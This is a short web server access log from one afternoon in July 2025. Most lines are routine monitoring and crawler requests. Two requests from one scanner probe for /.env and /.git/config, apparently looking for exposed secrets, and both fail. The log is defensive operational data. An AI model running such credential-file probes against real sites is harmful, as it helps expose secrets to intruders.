212.91.247.32 - - [03/Jul/2025:17:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:17:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
93.123.72.134 - - [03/Jul/2025:17:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:17:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [03/Jul/2025:17:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [03/Jul/2025:17:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.206 - - [03/Jul/2025:17:10:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.121.84.130 - - [03/Jul/2025:17:10:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [03/Jul/2025:17:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [03/Jul/2025:17:10:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:17:11:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:12:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:17:13:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.135.193.162 - - [03/Jul/2025:17:13:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [03/Jul/2025:17:13:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.234 - - [03/Jul/2025:17:14:32 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.91.247.32 - - [03/Jul/2025:17:14:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.64.138.130 - - [03/Jul/2025:17:15:10 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
170.64.138.130 - - [03/Jul/2025:17:15:11 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
212.91.247.32 - - [03/Jul/2025:17:15:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [03/Jul/2025:17:16:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [03/Jul/2025:17:16:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [03/Jul/2025:17:17:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
